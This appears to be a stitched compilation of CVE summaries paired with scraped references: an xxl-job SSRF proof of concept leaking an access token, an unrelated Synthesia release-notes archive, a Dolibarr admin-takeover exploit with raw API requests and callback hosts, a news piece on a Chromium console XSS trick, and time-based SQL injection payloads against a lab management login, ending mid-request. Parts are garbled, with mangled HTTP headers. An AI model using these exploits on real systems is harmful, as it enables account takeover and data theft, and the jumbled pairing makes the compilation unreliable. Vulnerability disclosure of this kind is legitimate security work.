XXL-Job before v2.3.1 contains a Server-Side Request Forgery (SSRF) via the component /admin/controller/JobLogController.java.

xxl-job =< 2.3.1 version (latest version) has SSRF vulnerability, which causes low-privileged users to control executor to execute arbitrary commands

1.  Vulnerability description  
    XXL-JOB is a distributed task scheduling platform based on java language in the XXL (XXL-JOB) community.  
    There is an SSRF vulnerability in xxl-job-2.3.1/xxl-job-admin/src/main/java/com/xxl/job/admin/controller/JobLogController.java of Xxl-job 2.3.1, which originates from /logDetailCat, it directly sends a query log request to the address specified by executorAddress without judging whether the executorAddress parameter is the valid executor address. The query request will have the XXL-JOB-ACCESS- TOKEN, resulting in the leakage of XXL-JOB-ACCESS-TOKEN, and then the attacker obtains XXL-JOB-ACCESS-TOKEN and calls any executor, causing the execution of arbitrary commands of the executor.  
    The /logDetailCat interface call only needs to be a low Privilege user of the platform。

2.Affected version  
Xxl-job-admin =< 2.3.1 （latest）

3.Proof of concept  
1、build an http server locally and print the http request header log.  
  
2、Create a normal user normal without any executor permissions。  
  
  
3、When using the normal user to call the interface, set the input parameter executor Address to the http server address in step 1, and print the XXL-JOB-ACCESS-TOKEN directly on the target server  
curl 'http://localhost:8080/xxl-job-admin/joblog/logDetailCat' \ -H 'Accept: application/json, text/javascript, */*; q=0.01' \ -H 'Accept-Language: zh-CN,zh;q=0.9' \ -H 'Connection: keep-alive' \ -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \ -H 'Cookie: Idea-6a85f0b8=3349f800-77dc-4e25-a562-885457beb2aa; XXL_JOB_LOGIN_IDENTITY=7b226964223a322c22757365726e616d65223a226e6f726d616c222c2270617373776f7264223a223563373066666266643839303065626533643037326562346162353064376162222c22726f6c65223a302c227065726d697373696f6e223a22227d' \ -H 'Origin: http://localhost:8080' \ -H 'Referer: http://localhost:8080/xxl-job-admin/' \ -H 'Sec-Fetch-Dest: empty' \ -H 'Sec-Fetch-Mode: cors' \ -H 'Sec-Fetch-Site: same-origin' \ -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36' \ -H 'X-Requested-With: XMLHttpRequest' \ -H 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"' \ -H 'sec-ch-ua-mobile: ?0' \ -H 'sec-ch-ua-platform: "macOS"' \ --data-raw 'executorAddress=http://10.224.203.118&logId=0&fromLineNum=0&triggerTime=1586629003729' \ --compressed   
  

4、Use the token to call the task trigger interface of the executor Restful API to execute arbitrary commands  

4、Recommendations  
The same as in JobLogController.java, when matching the /joblog route, it will enter the index method to judge whether the 'executorAddress executor address belongs to the executor address.

CVE-2022-43183: xxl-job =< 2.3.1 version (latest version) has SSRF vulnerability, which causes low-privileged users to control executor to execute arbitrary commands · Issue #3002 · xuxueli/xxl-job

A buffer overflow in Synthesia before 10.7.5567, when a non-Latin locale is used, allows user-assisted attackers to cause a denial of service (application crash) via a crafted MIDI file with malformed bytes. This file is mishandled during a deletion attempt. In Synthesia before 10.9, an improper path handling allows local attackers to cause a denial of service (application crash) via a crafted MIDI file with malformed bytes.

Oct 31 2021

**Synthesia 10.8**

MusicXML files can now be opened by Synthesia!

For now, none of the additional musical information (vs. a MIDI file) is being used when drawing sheet music. But MusicXML files should load, play, and sound correct. We'll be using the newly available musical information to improve the sheet music over the next several updates. If you spot something that doesn't sound correct, please let us know!

What's new in **Synthesia 10.8**:

*   MusicXML file loading.
*   Reworked full-screen sheet music navigation. (Watch the video.)
*   The song list should load about 100x faster.
*   Apple silicon support on macOS.
*   Many other fixes and improvements.

May 20 2021

**Changing Lives for 15 Years**

Synthesia has been around since before apps were called apps. Over the years, my favorite thing has been learning the different ways it has impacted the lives of its users.

Recently YouTube collected and showcased a number of stories about videos that have done the same for users of their platform. One of those stories was about a Japanese seaweed farmer that used videos of songs played in Synthesia to achieve his dreams of becoming a pianist.

It's a great story that you can watch, here. (It's in Japanese, so you may need to click the CC button at the lower-right to turn on subtitles.)

Hearing from so many of you over the years has brought no end to the gratification this project has given me. Thank you for going on this journey with me and thank you for using Synthesia!

\- Nicholas

Feb 15 2021

**Synthesia 10.7**

Simple MIDI Recording, down-stems, and new languages:

*   Added a simple multi-track recorder to the Free Play screen (when unlocked).
*   Improved sheet music: note stems are now able to point down.
*   Added three new display languages: Catalan, Turkish, and Japanese.
*   Many other fixes and improvements.

Sep 29 2019

**Synthesia 10.6**

Full-screen Sheet Music:

*   Use the new gear menu to show full-screen sheet music.
*   Navigate through the song by clicking the sheet music.
*   Bookmarks and loops are now shown in sheet music.
*   Set the number of errors before your loop restarts automatically.
*   Many other bug fixes and improvements.

Jan 29 2019

**Synthesia 10.5.1**

New settings and lots of fixes:

*   Added Thai language support.
*   Added 9 new settings to customize under Gameplay and Advanced.
*   The built-in synth (on PC and Android) now has nicer reverb.
*   Fixed high CPU usage on macOS Mojave.
*   iPad Pro 11" screen size support.
*   About a dozen other bug fixes and small improvements.

Nov 21 2018

**Synthesia 10.5**

Better sounds, iOS Files support, Android M MIDI, Chromebooks, and more!

*   Added a faster synth with better sounds for Windows and Android.
*   You can now manage your songs on the iPad with the Files app.
*   MIDI devices should now appear on compatible Chromebook models.
*   Improved Android MIDI compatibility.
*   Improved Windows 10 MIDI compatibility.
*   Many more features, bug fixes, and performance improvements.

Nov 17 2017

**Synthesia 10.4**

Sharp notation, Windows 10 MIDI, "Simple" labels, AVI export, and more!

*   Sheet music now always appears sharp, regardless of size.
*   Windows 10 MIDI support: lower latency synth and Bluetooth MIDI!
*   Support for "The ONE Smart Keyboard" key lights on iPad and Android.
*   New "Simple" labels mode that shows C, D, E, etc. on white keys only.
*   Windows version of the Video Creator now lets you export AVI files.
*   And 20+ more features and bug fixes.

Sep 13 2016

**Synthesia 10.3**

More songs, more languages, more modernization, and lots of fixes!

*   Added 5 songs from the Undertale and Five Nights at Freddy's games.
*   Added Slovenian and Polish language support.
*   Retina support for Mac, now making Synthesia HiDPI-aware everywhere.
*   Try the first 20 seconds of any song without unlocking Synthesia.
*   Plus 16 more features and 15 bug fixes.

Aug 23 2015

**Synthesia 10.2**

Synthesia 10.2 adds new conveniences and smooths a few rough edges!

*   Unlock Synthesia for Android using your key from the desktop version!
*   Discover our how-to guides using Synthesia's new help buttons.
*   Try out even more songs in trial mode.
*   Read the larger key and note labels more easily.
*   Toggle loops on/off with the "/" key.
*   Set your zoom level to "Custom", then match the screen to your keyboard.
*   Install more easily on Windows in a single click.
*   Enjoy 48 more improvements and fixes!

Jan 6 2015

**Synthesia 10.1**

Added Dutch language support and fixed 17 bugs!

Dec 19 2014

**Synthesia for Android**

If you've got an Android device that runs Android 4.1 or later, download Synthesia now:

Keyboards can be connected using USB On-The-Go cables.

Synthesia 10 adds dozens of major features!

*   Easy hand splitting for songs that were arranged as a single piano part.
*   A new Free Play area to experiment with notes, instruments, and chords.
*   See the next loop before it starts! No more sudden jumps.
*   Recently played song list on the title screen for quick navigation.
*   Italian language support.
*   Much, much more...

Synthesia 9 lets more people play than ever!

*   Multiple languages! Choose between English, Spanish, French, German, Russian, Brazilian Portuguese, and Traditional Chinese.
*   Change Synthesia's window size anytime you like.
*   Press Alt-Enter to toggle full-screen mode on any monitor.
*   Support for the new Synthesia Music Store.

Synthesia 8.6 gets things ready for the upcoming song store.

*   Lots of new metadata support for the upcoming song store.
*   Add your own background image using the configuration tool.
*   Click the score box to hide it.
*   The "Scale Number" label mode is back.
*   Over a dozen more bug fixes and improvements.

Synthesia 8.5 is a small release containing 21 bug fixes and an easier way to enter unlock keys.

There are too many improvements to list! Every single screen has been overhauled with new or improved features everywhere.

Synthesia for iPad

It's a natural fit. Put your iPad right on your keyboard's music stand.

Synthesia for iPad makes no compromises: every feature you love on the desktop has made the transition smoothly. Connect your keyboard or play using the touchscreen.

Improved On-Screen Keyboard

The menus aren't the only thing that have been improved. The keyboard and falling notes have never looked this good before.

The new graphics have been accurately modeled from a real piano. Pan left or right by dragging in the falling note area. Zoom in or out smoothly by pinching on the iPad or using the zoom menu on the desktop.

Color Themes

Not ready for so much change? Head over to the Color Themes section under Settings and switch over to the "Synthesia Classic" theme.

You can make your own themes, too. Check out the new modding forum for details. Then share your color theme with others.

So Much More...

Multiple input/output device support, smooth-scrolling song library, user profile statistics, song library auto-grouping by folder, lots of new options, helpful prompts throughout all the menus, redesigned advanced song settings, and the list keeps going!

May 16 2012

**Tips for Synthesia Songwriters**

Do you create your own songs to share with others using Synthesia?

Check out this guide that shows a few easy steps to get the most out of Synthesia's features with your own songs:

Creating Great Content for Synthesia

In just a few minutes you'll be able to add extended metadata, include finger hints, enable the simple song view, create links on your site that will open Synthesia in a single click, and more!

Apr 5 2012

**Synthesia 0.8.3**

The new song progress tracking feature is Synthesia's best feature ever. Grab Synthesia 0.8.3 now to get it along with a dozen or so new features.

Stay Motivated, Track Your Progress

Let Synthesia guide you through the process of learning every song. The new song progress metric lets you to set personal goals and watch them become realized.

Whenever you play a song, you have a chance at proving how far you've progressed in that song.

This is my new personal favorite feature.

It's Just You and the Music

Synthesia 0.8.3 brings a new, cleaner play screen. All of the clutter has been tucked into a menu at the top of the screen.

With fewer distractions and a display much friendlier to lower-resolution screens, it's just you and your music.

Launch Synthesia From Your Browser

After you run Synthesia 0.8.3 for the first time, you are ready to launch songs in a single click. Try it out: Bach Chorale.

Want to create your own Synthesia links for your website or YouTube videos? Use the Synthesia Song Link Generator tool.

New Scale and Arpeggio Exercises

Try out the new exercises by Ash from the forums. Each exercise is split into separate hands and includes finger hints. You'll find them in the song library under "Ash's Exercises".

Nov 7 2011

**Synthesia 0.8.2**

With keyboard navigation, huge improvements to the sheet display, and dozens of quality of life improvements, Synthesia 0.8.2 is the biggest release ever.

Control Everything with Your Keyboard

Customize all song controls. Fast-forward and rewind with your pitch bend wheel. Pause the song with your lowest note. Change the speed with your modulation wheel.

The sky is the limit.

Dramatically Improved Sheet Music

Follow along smoother than ever with new note and measure highlighting. Never lose your place with an easier to follow page-turn effect.

Synthesia's sheet music now supports key signatures, time signatures, staccato notes, crowded notes, better clef detection, smarter spacing, crisper staff and bar lines, and still more.

And More...

*   Keyboard settings are remembered much smarter between sessions.
*   Windowed mode on the Mac along with a better Mac install experience.
*   Automatically pause when a keyboard connection is lost.
*   Dozens of other tweaks and fixes.

Jun 6 2011

**Synthesia 0.8.1**

What's new in 0.8.1:

*   Add finger number hints to your songs in a single click. (video)
*   Finger hints included for all 100+ built-in songs.
*   Simplified track settings let you jump in fast.
*   Improved library searching to find your favorite songs quicker.
*   Many improvements in MIDI, device, and computer compatibility.
*   Tons of tweaks and fixes.

Dec 16 2010

**Synthesia on _Strictly Come Dancing_**

_Strictly Come Dancing_ is the original UK version of _Dancing with the Stars_. Each year the show puts the trainers through a crazy challenge. This season, Synthesia's falling note display was combined with a giant floor piano in the "ITT Grand Piano Challenge".

They kind of threw them to the wolves by only giving the trainers one attempt and not letting them practice ahead of time.

Check out the final two performances and award ceremony from the show.

Nov 13 2010

**Synthesia 0.8.0**

What's new in 0.8.0:

*   Named profiles. See your name next to your scores after playing locally or online. Compete against friends.
*   Many settings can now be changed during gameplay.
*   The beginnings of a new look...
*   A handful of fixes and other tweaks.

Oct 8 2010

**Synthesia 0.7.5**

What's new in _0.7.5_:

*   Competition-ready songs and scoring.
*   Revamped track settings saves time with copy and paste settings.
*   Better song library performance, especially with big collections.
*   Several tweaks and improvements to all play modes.

Sep 1 2010

**Synthesia 0.7.4**

This month we have a few things I've wanted to include forever now.

What's new in _0.7.4_:

*   Lighted keyboard support: the next note will light up while stopped in practice mode. Turn it on via the Keyboard Setup screen.
*   Improved note labels: new mode, more accurate, and easier to read.
*   New configuration tool with windowed mode and resolution picker.
*   Improved looping: easier to use, easier to find, better feedback.
*   A number of stability and other bug fixes.

Aug 1 2010

**Synthesia 0.7.3**

The long-awaited metronome is available at last. Lots of other great engine work made it in to prepare for the upcoming online scoreboard.

What's new in _0.7.3_:

*   Metronome. Control the speed, volume, and style. Works with simple, compound, and even changing time signatures.
*   Have fun with instruments. Click a track's instrument icon to change.
*   Find songs faster. Search with the new song library filter box.
*   Create quick loops between bookmarks using the < and > keys.
*   Speed improvements. Gameplay now runs smoother than ever.

Jun 30 2010

**Synthesia 0.7.2**

Synthesia is moving full-speed ahead now. This is the first of six monthly releases that will run until the end of the year.

Check out what's new below, download the new version, and enjoy!

What's new in _0.7.2_:

*   Song looping: Create loops with one click to keep practicing those tough parts. Statistics are shown in real time detailing how you are improving.
*   Synthesia is now aware of smaller keyboards. Set your size on the keyboard screen and Synthesia will play notes outside your reach or move them closer so you can play them yourself.
*   Scoring revamp: hold notes for their full duration for maximum points!
*   Lots of other improvements and fixes.

May 30 2010

**Synthesia 0.7.1**

It's ready. This is an exciting time for the project. The 0.7.1 release is a great stepping-stone to the newly accelerated development schedule I've just started. Expect to see releases with more, released more often from here on out for the next six months!

In the meantime, check out what's new below, download the new version from the box on the left, and enjoy!

What's new in _0.7.1_:

*   Song Bookmarks: place markers that let you jump right to those tough sections.
*   New play screen navigation: click the timeline to jump, the buttons to navigate, or the mouse-wheel while paused to scroll the song.
*   Your keyboard's sustain pedal will now hold the duration of notes.
*   Sheet music improvement: notes are much smarter about which staff to appear on.
*   Improved song library searching: type a song name to jump right there.
*   Better error reporting: crash report files help me jump right to the problem.
*   Tons of other improvements and bug fixes.

Sep 19 2009

**Synthesia 0.7.0**

I am proud to present the 0.7.0 release of Synthesia. Check out the feature list, download the new version from the box on the left, and enjoy!

What's new in _0.7.0_:

*   New _Song Library_ with audio previews and sorting by difficulty and rating.
*   More than _20 new songs_ and over _100 songs updated_ to split the left/right hand parts. (Thanks Choul, Rickeeey, and TieDyeGuy from the forums!)
*   Scoring for practice mode: now you can follow your progress.
*   Sheet music display improvements including rests and a fixed-width option.
*   An option to require all notes in a chord be pressed at the same time in practice mode.
*   Keyboard setup screen to help diagnose connection problems.
*   Lots of menus re-worked to make navigation easier and more intuitive.
*   New "View in Synthesia" right-click shortcut: a quick MIDI viewer.
*   Tons of other improvements, fixes, and optimizations!

Sep 19 2008

**Synthesia 0.6.5**

It's that time again. Here is the new 0.6.5 release of the game. There is lots of new stuff to check out, so download the new version from the box on the left and enjoy!

What's new in _0.6.5_:

*   Note and key labels (C, C#, D or Do, Re, Mi).
*   Resizeable sheet music display.
*   120+ new songs included from G Major Music Theory.
*   Faster startup and gameplay.
*   The usual assortment of bug fixes and improvements.

Jun 5 2008

**Synthesia 0.6.4**

I am very pleased to present both the new 0.6.4 release of Synthesia. Download the game from the box on the left and enjoy!

What's new in _0.6.4_:

*   Practice mode that waits for the correct notes.
*   Sheet music display with two display styles.
*   Measure lines in the falling notes.
*   Play-settings screen that gives more control over gameplay.
*   Several new options to tweak the display and a handful of bug fixes.

Jan 1 2008

**Synthesia 0.6.3**

What's new in _0.6.3_:

*   Zoom to song or 'You Play' extents so notes are easier to follow.
*   Option screen that allows some tweaking, most-important: play all user input.
*   Lots of bug fixes, new DirectX back-end to correct some issues.
*   A few visual updates.

This one is smaller than expected because the holidays were busier than I had hoped.

Aug 29 2007

**Synthesia 0.6.2**

New in version _0.6.2_ (August 29, 2007)

*   Rewind / fast-forward during songs.
*   Top scores list for each song you play.
*   Song and track settings are saved between plays.
*   New note spark effect.
*   A software keyboard so everyone can try it out.
*   Auto-splitting single-track MIDI songs to have one track per instrument.

Highlights coming up in version _0.6.3_ (December 31, 2007)

*   Sheet music display!
*   Zoom to your keyboard or song extents.
*   Tons of new built-in music and warm-up exercises.
*   Lots of display and game customization via new options screen.
*   Many new visual effects!

May 28 2007

**Synthesia 0.6.1**

_Synthesia 0.6.1_ is now available! Report any problems in the forum. Major changes:

*   External devices can now be selected for output in the Mac version.
*   The Mac version behaves much nicer now (after about a dozen bug fixes).
*   A couple Windows bugs were fixed.

Apr 30 2007

**Synthesia 0.6.0**

It's here! Download either the Windows or the new Mac version of Synthesia 0.6.0 to get improved graphics and performance.

Apr 25 2007

**Activision Cease and Desist**

I have received a cease and desist letter from Activision for the use of the name "Piano Hero". See the cease and desist page for details.

Quick summary: Choose a new name for the project and update the website/game. The 0.6.0 release (introducing Mac support) has been pushed back a week to April-30 to compensate.

Name Suggestions: 430 names (68 duplicates) with 6 images. Check out the complete list.

Winning Name: "Synthesia", suggested by Daniel Lawrence from England. It's an incredible name, thanks again Daniel!

(Check out Destructoid's article about this whole situation. It's funny.)

Feb 20 2007

**Synthesia 0.5.1**

MIDI input now plays back in the correct instrument, feedback and stats have been improved, there are now tooltips on each menu control, lots of bug fixes, a new installer, and a set of 10 fantastic songs from Game Music Themes! What are you waiting for?

Feb 14 2007

**Want a Mac version of Synthesia?**

Alright. You guys are awesome.

The response from just a couple of articles has been absolutely unbelievable and in a **single day** you donated more than enough for a Mac mini. So much, in fact, that I can get an iMac instead. You guys are really incredible, thank you! You will get your Mac version as promised!

Jan 26 2007

**Synthesia 0.5.0**

Synthesia 0.5.0 Released! MIDI input is now supported. Try to get the highest score and earn the best grade. Download Now!

Dec 9 2006

**Synthesia 0.4.0**

Want to learn how to play the piano? Synthesia is a fun way to play any kind of music including your favorite video game music, classical music, and holiday music. Check out the feature list, screenshots, and then download it.

**Features**

*   Supports any MIDI file.
*   Practice left or right hand parts separately.
*   Slow songs down while learning new parts.

**Work In Progress**

*   Real piano is required - no "software" keyboard is provided.
*   MIDI input not supported yet - just play along for now.
*   Without MIDI input, grading or scoring isn't possible.

CVE-2021-33897: Synthesia News Archive

Dolibarr Open Source ERP & CRM for Business before v14.0.1 allows attackers to escalate privileges via a crafted API.

**Dolibarr ERP 14.0.1 - Privilege Escalation**

**Platform:****PHP**

**Date:****2021-09-02**

  

    # Exploit Title: Dolibarr ERP/CRM 14.0.1 - Privilege Escalation
    # Date: April 8, 2021
    # Exploit Author: Vishwaraj101
    # Vendor Homepage: https://www.dolibarr.org/
    # Affected Version: <= 14.0.1
    # Patch: https://github.com/Dolibarr/dolibarr/commit/489cff46a37b04784d8e884af7fc2ad623bee17d
    
    *Summary:*
    Using the below chain of issues attacker can compromise any dolibarr
    user account including the admin.
    
    *Poc:*
    
       1. Visit https://example.com/api/index.php/login?login=demo&password=demo
       try to login with a test user with 0 permissons or less permissions.
       2. We will receive an api token in return.
       3. Next we need to fetch the user id of the user whose account we want
       to own.
    
    
    
    *First we need to fetch the user id of the admin user using the below api.*
    
    *Request1:*
    
    GET /api/index.php/users/login/admin HTTP/1.1Host:
    preview2.dolibarr.ohttps://preview2.dolibarr.org/api/index.php/users/login/adminrg
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36
    (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
    root@tqn9xk6rn6fq8x9ijbmpouosrjxan3srh.burpcollaborator.netAccept:
    application/json
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflateDOLAPIKEY: test1337Connection: close
    
    *This will return the user details using the username. Now update the
    victim user account via below api (include the json body received from the
    previous request1 and replace the email id from below json to the attacker
    controlled email)*
    
    
    *Request2:*PUT /api/index.php/users/*12* HTTP/1.1
    
    Host: preview2.dolibarr.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1;
    WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87
    Safari/537.36 root@67bmexn44jw3paqv0o3257558wen5mwal.burpcollaborator.netAccept:
    application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip,
    deflateDOLAPIKEY: test1337Origin:
    https://preview2.dolibarr.orgConnection: closeReferer:
    http://5z5l6wf3wio2h9iusnv1x6x40v6mxkw8l.burpcollaborator.net/refContent-Length:
    3221
    {
        "id": "12",
        "statut": "1",
        "employee": "1",
        "civility_code": null,
        "gender": "woman",
        "birth": 495583200,
        "email": "*attacker@example.com <attacker@example.com>*",
        "personal_email": "",
        "socialnetworks": {
            "facebook": "",
            "skype": "",
            "twitter": "",
            "linkedin": "",
            "instagram": "",
            "snapchat": "",
            "googleplus": "",
            "youtube": "",
            "whatsapp": "",
            "tumblr": "",
            "vero": "",
            "viadeo": "",
            "slack": "",
            "xing": "",
            "meetup": "",
            "pinterest": "",
            "flickr": "",
            "500px": "",
            "giphy": "",
            "gifycat": "",
            "dailymotion": "",
            "vimeo": "",
            "periscope": "",
            "twitch": "",
            "discord": "",
            "wikipedia": "",
            "reddit": "",
            "quora": "",
            "tripadvisor": "",
            "mastodon": "",
            "diaspora": "",
            "viber": ""
        },
        "job": "Admin Technical",
        "signature": "",
        "address": "",
        "zip": "",
        "town": "",
        "state_id": null,
        "state_code": null,
        "state": null,
        "office_phone": "",
        "office_fax": "",
        "user_mobile": "",
        "personal_mobile": "",
        "admin": "1",
        "login": "admin",
        "entity": "0",
        "datec": 1507187386,
        "datem": 1617819214,
        "socid": null,
        "contact_id": null,
        "fk_member": null,
        "fk_user": "11",
        "fk_user_expense_validator": null,
        "fk_user_holiday_validator": null,
        "clicktodial_url": null,
        "clicktodial_login": null,
        "clicktodial_poste": null,
        "datelastlogin": 1617816891,
        "datepreviouslogin": 1617815935,
        "datestartvalidity": "",
        "dateendvalidity": "",
        "photo": "com.jpg",
        "lang": "fr_FR",
        "rights": {
            "user": {
                "user": {},
                "self": {}
            }
        },
        "conf": {},
        "users": [],
        "parentof": null,
        "accountancy_code": "",
        "weeklyhours": "39.00000000",
        "color": "",
        "dateemployment": "",
        "dateemploymentend": "",
        "default_c_exp_tax_cat": null,
        "default_range": null,
        "fk_warehouse": null,
        "import_key": null,
        "array_options": [],
        "array_languages": null,
        "linkedObjectsIds": null,
        "canvas": null,
        "fk_project": null,
        "contact": null,
        "thirdparty": null,
        "user": null,
        "origin": null,
        "origin_id": null,
        "ref": "12",
        "ref_ext": null,
        "status": null,
        "country": null,
        "country_id": null,
        "country_code": "",
        "region_id": null,
        "barcode_type": null,
        "barcode_type_code": null,
        "barcode_type_label": null,
        "barcode_type_coder": null,
        "mode_reglement_id": null,
        "cond_reglement_id": null,
        "demand_reason_id": null,
        "transport_mode_id": null,
        "cond_reglement": null,
        "modelpdf": null,
        "last_main_doc": null,
        "fk_bank": null,
        "fk_account": null,
        "note_public": "",
        "note_private": "",
        "note": "",
        "name": null,
        "lastname": "Adminson",
        "firstname": "Alice",
        "civility_id": null,
        "date_creation": null,
        "date_validation": null,
        "date_modification": null,
        "specimen": 0,
        "alreadypaid": null,
        "liste_limit": 0
    }
    
    This will reset the admin email account to the attacker controlled
    email account, now using the password reset feature attacker will
    reset the admin account password and will gain access to the admin
    account.

CVE-2022-43138: Offensive Security’s Exploit Database Archive

A case study on the complexity of browser security

A case study on the complexity of browser security

  

Malicious actors can stage cross-site scripting (XSS) attacks across the subdomains of a website if they can trick users of Chromium browsers into entering a simple JavaScript command in the developer console.

This is according to the findings of security researcher Michał Bentkowski who presented his findings in a blog post published yesterday (November 16) titled Google Roulette.

While the bug is hard to exploit and Google has decided not to patch it, it is an interesting case study on the complexities of browser security.

**Same-origin policy, site isolation**

Chromium browsers have several safeguards to prevent XSS attacks. The Same-Origin policy feature prevents scripts in one browser tab from accessing cookies and data from another domain.

The Site Isolation feature, on the other hand, gives a separate process to each domain to prevent different websites from accessing each other’s memory space in the browser.

However, it is worth noting that Same-Origin and Site Isolation do not apply to subdomains.

Therefore, two browser tabs that are on, say, https://workspace.google.com and https://developer.google.com will run on the same process and are considered to be of the same origin (google.com).

**Developer console scripts**

The browser’s protection mechanisms apply not only to on-page scripts but also to scripts running in the browser’s developer console. However, the developer console has access to certain extra functions that are not available to on-page scripts.

One of these functions is , which sets breakpoints on specific events, such as when a function is called.

Two things are interesting about . First, it has an optional argument that allows you to replace the breakpoint functionality with a custom JavaScript code. And second, when you use the developer console to define a event on a webpage, it persists across page refreshes and even carries to other subdomains of the same origin in the same tab.

DON’T MISS CSRF in Plesk API enabled server takeover

How does lead to XSS? First, Bentkowski set up a page that contained two malicious functions.

The first one is the XSS payload, which iterates across the subdomains of the current origin and runs a proof-of-concept script (in this case an popup).

The second one is a getter function called that defines a event for the function (which happens many times during a page load) and reloads the page.

Since needs to be explicitly called from the developer console, the page displays a message that prompts the user to call from the developer console. After that, the XSS cycle is triggered and goes through any number of subdomains defined in the payload function.

A video containing a proof-of-concept can be found here.

**Impact and fix**

“I see it more as an interesting technical bug than something exploitable in the real world,” Bentkowski told The Daily Swig. “In my opinion, the user interaction required by this attack makes it not really feasible for attackers.”

There are, however, two scenarios where this bug can become concerning, according to Bentkowski.

First are websites where users can create their own subdomains. In this case, a user can create a malicious page and trick visitors into triggering the XSS function on their own subdomain.

Read more of the latest browser security news

A second scenario is when there is an XSS vulnerability on one subdomain and the attacker wants to escalate it to others through the developer console.

Bentkowski reported the bug in 2020 and Google has apparently decided not to fix it. “The issue isn’t currently assigned to anyone so it doesn’t look like we can expect the patch soon,” Bentkowski said.

However, Google agreed to allow Bentkowski to make his findings public, telling him that since the bug is no longer exploitable via Chrome Extensions, it is no longer a security issue.

“I still think that there might be some ways to escalate it that I failed to discover, and maybe you, my dear readers, will have some better ideas,” Bentkowski wrote on his blog.

YOU MIGHT ALSO LIKE Mastodon users vulnerable to password-stealing attacks

Google Roulette: Developer console trick can trigger XSS in Chromium browsers

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the username parameter at /diagnostic/login.php.

**Online Diagnostic Lab Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: hujun

vendors:https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html

Vulnerability File: /diagnostic\_0/diagnostic/login.php

POST parameter 'username' exists delayed injection vulnerability

Payload1: username=12' AND (SELECT 2348 FROM (SELECT(SLEEP(5)))zxcv) AND 'bnm'='bnm&password=ab&login=

    POST /diagnostic_0/diagnostic/login.php HTTP/1.1
    Host: localhost
    Content-Length: 118
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/diagnostic_0/diagnostic/login.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: ci_session=pq7i0frcc6092gm4porg5cvqj5e9n54q; PHPSESSID=ngqgr9p2erqb85jg0veeql3i15
    Connection: close
    
    username=12%27+AND+%28SELECT+2348+FROM+%28SELECT%28SLEEP%285%29%29%29zxcv%29+AND+%27bnm%27%3D%27bnm&password=ab&login=
    

SELECT(SLEEP(5)), The server response time is 5 seconds

Payload2: username=12' AND (SELECT 2348 FROM (SELECT(SLEEP(10)))zxcv) AND 'bnm'='bnm&password=ab&login=

    POST /diagnostic_0/diagnostic/login.php HTTP/1.1
    Host: localhost
    Content-Length: 119
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/diagnostic_0/diagnostic/login.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: ci_session=pq7i0frcc6092gm4porg5cvqj5e9n54q; PHPSESSID=ngqgr9p2erqb85jg0veeql3i15
    Connection: close
    
    username=12%27+AND+%28SELECT+2348+FROM+%28SELECT%28SLEEP%2810%29%29%29zxcv%29+AND+%27bnm%27%3D%27bnm&password=ab&login=
    

SELECT(SLEEP(10)), The server response time is 10 seconds

Payload3: username=12' AND (SELECT 2348 FROM (SELECT(SLEEP(15)))zxcv) AND 'bnm'='bnm&password=ab&login=

    POST /diagnostic_0/diagnostic/login.php HTTP/1.1
    Host: localhost
    Content-Length: 119
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/diagnostic_0/diagnostic/login.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
